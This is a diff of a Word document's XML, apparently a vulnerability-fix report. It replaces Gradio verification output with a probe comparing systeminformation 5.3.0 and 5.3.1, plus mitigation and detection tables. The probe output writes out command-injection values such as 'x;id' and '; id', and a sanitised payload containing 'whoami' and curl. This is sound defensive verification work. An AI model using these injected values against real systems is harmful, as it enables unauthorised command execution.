+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>What it stops</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="1474"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Code</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4876"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Never pass request data into a shell-building API; validate against a narrow pattern</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>the injection itself</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="1474"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Dependency</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4876"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Pin the version and run npm audit / pip-audit in CI (section 6)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>shipping the vulnerable release at all</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="1474"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Runtime</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4876"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Run the container as an unprivileged user; read-only mounts; no cloud credentials in the image</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>the blast radius after execution</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="1474"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Network</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4876"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Keep the dashboard on an internal network or behind an authenticating proxy</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>reaching the endpoint at all</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="1474"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Detection</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4876"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Alert on parameters containing shell metacharacters, on latency outliers and on unexpected child processes</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>catching it when the other layers fail</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>13. Verifying the fix</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Verification has two parts: the exploit must fail, and the application must still work. Both were checked at the level the author could actually run — the library itself — and the container-level script is provided for the reference environment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>13.1 Library-level evidence (executed)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The probe runs identical calls against 5.3.0 and 5.3.1 and prints what each release does with a non-string parameter. This is the part of the fix that can be measured without a POSIX shell, and it is the part the advisory describes as “reject any arrays”.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7528,7 +7241,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ python exploit/verify_fix.py http://127.0.0.1:7860</w:t>
+        <w:t>$ npm install systeminformation@5.3.0 --prefix .tmp/old</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7537,7 +7250,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>$ npm install systeminformation@5.3.1 --prefix .tmp/new</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7546,7 +7259,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&gt; GET http://127.0.0.1:7860/config</w:t>
+        <w:t>$ node exploit/version_probe.js .tmp/old/node_modules/systeminformation</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7555,7 +7268,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; HTTP 200 OK</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7564,7 +7277,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Type: application/json</w:t>
+        <w:t>=== 5.3.0 - the vulnerable release ===</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7573,7 +7286,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Length: 2471</w:t>
+        <w:t>systeminformation 5.3.0</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7591,7 +7304,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>[i] components exposed by /config: [1, 2, 3, 4]</w:t>
+        <w:t>[1] what the function accepts as its parameter</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7600,7 +7313,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">  services('nginx')             accepted -&gt; 1 row(s), first name: "nginx"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7609,7 +7322,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&gt; POST http://127.0.0.1:7860/component_server</w:t>
+        <w:t xml:space="preserve">  services(['nginx','sshd'])    accepted -&gt; 1 row(s), first name: "nginxsshd"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7618,7 +7331,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; HTTP 404 Not Found</w:t>
+        <w:t xml:space="preserve">  services(['nginx','x;id'])    accepted -&gt; 1 row(s), first name: "nginxx;id"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7627,7 +7340,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Type: application/json</w:t>
+        <w:t xml:space="preserve">  services({toString})          accepted -&gt; 303 row(s), first name: "adpsvc"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7636,7 +7349,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Length: 32</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7645,7 +7358,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; body: {"detail":"Function not found."}</w:t>
+        <w:t>[2] processLoad, same contract</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7654,7 +7367,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">  processLoad(['node','; id'])  accepted -&gt; 1 row(s), first name: "node; id"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7663,7 +7376,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&gt; POST http://127.0.0.1:7860/component_server</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7672,7 +7385,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; HTTP 404 Not Found</w:t>
+        <w:t>[3] the sanitiser that both versions ship</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7681,7 +7394,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Type: application/json</w:t>
+        <w:t xml:space="preserve">  sanitizeShellString(payload)  "nginx id  whoami  curl http://x/echo yid"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7690,7 +7403,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Length: 32</w:t>
+        <w:t xml:space="preserve">  sanitizeShellString(strict)   "nginxidwhoamicurlhttp://x/echoyid"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7699,7 +7412,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; body: {"detail":"Function not found."}</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7708,7 +7421,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>$ node exploit/version_probe.js .tmp/new/node_modules/systeminformation</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7717,7 +7430,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&gt; POST http://127.0.0.1:7860/component_server</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7726,7 +7439,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; HTTP 404 Not Found</w:t>
+        <w:t>=== 5.3.1 - the fixed release ===</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7735,7 +7448,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Type: application/json</w:t>
+        <w:t>systeminformation 5.3.1</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7744,7 +7457,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Length: 32</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7753,7 +7466,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; body: {"detail":"Function not found."}</w:t>
+        <w:t>[1] what the function accepts as its parameter</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7762,7 +7475,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">  services('nginx')             accepted -&gt; 1 row(s), first name: "nginx"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7771,7 +7484,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&gt; POST http://127.0.0.1:7860/component_server</w:t>
+        <w:t xml:space="preserve">  services(['nginx','sshd'])    accepted -&gt; []  (empty result - parameter rejected)</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7780,7 +7493,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; HTTP 404 Not Found</w:t>
+        <w:t xml:space="preserve">  services(['nginx','x;id'])    accepted -&gt; []  (empty result - parameter rejected)</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7789,7 +7502,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Type: application/json</w:t>
+        <w:t xml:space="preserve">  services({toString})          accepted -&gt; []  (empty result - parameter rejected)</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7798,7 +7511,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; Content-Length: 32</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7807,7 +7520,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; body: {"detail":"Function not found."}</w:t>
+        <w:t>[2] processLoad, same contract</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7816,7 +7529,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>[!] every component id was rejected by /component_server</w:t>
+        <w:t xml:space="preserve">  processLoad(['node','; id'])  accepted -&gt; []  (empty result - parameter rejected)</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7834,7 +7547,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>=== regression test: the Gradio app still works ===</w:t>
+        <w:t>[3] the sanitiser that both versions ship</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7843,7 +7556,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; GET /config -&gt; 200</w:t>
+        <w:t xml:space="preserve">  sanitizeShellString(payload)  "nginx id  whoami  curl http://x/echo yid"</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7852,52 +7565,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; GET /        -&gt; 200</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[PASS] the interface is still served</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>=== summary ===</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[PASS] CVE-2024-1561 no longer reproducible</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[PASS] regression test green -&gt; fix validated</w:t>
+        <w:t xml:space="preserve">  sanitizeShellString(strict)   "nginxidwhoamicurlhttp://x/echoyid"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7910,7 +7578,492 @@
           <w:color w:val="595F66"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>Actual output of the verification script against the patched version.</w:t>
+        <w:t>Actual output of cve-fixes/exploit/version_probe.js against both releases (evidence/si_probe.txt, abridged).</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+        <w:tblLayout w:type="fixed"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2835"/>
+        <w:gridCol w:w="3515"/>
+        <w:gridCol w:w="2835"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader w:val="true"/>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Observation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>5.3.0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>5.3.1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>services(['nginx','sshd'])</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>accepted, row named “nginxsshd” — the array was coerced</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>rejected, empty result</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>services(['nginx','x;id'])</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>accepted, the semicolon survives into the value</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>rejected</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>services(object)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>accepted, silently becomes the wildcard “all services”</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>rejected</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>processLoad(['node','; id'])</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>accepted</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>rejected</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>sanitizeShellString()</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="3515"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>strips ; | &amp; $ ( ) and quotes</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>identical filter</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The second row is the important one: in 5.3.0 the semicolon is preserved in the value that the library then places inside a shell command. In 5.3.1 the call never reaches the shell because the parameter is not a string.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>13.2 Container-level verification (reference environment)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="170"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>$ python exploit/verify_fix.py --target http://127.0.0.1:3000</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== 1. health / version ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>&lt; version 5.3.1</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== 2. exploit attempt ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>&lt; HTTP 400 in 0.01s</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
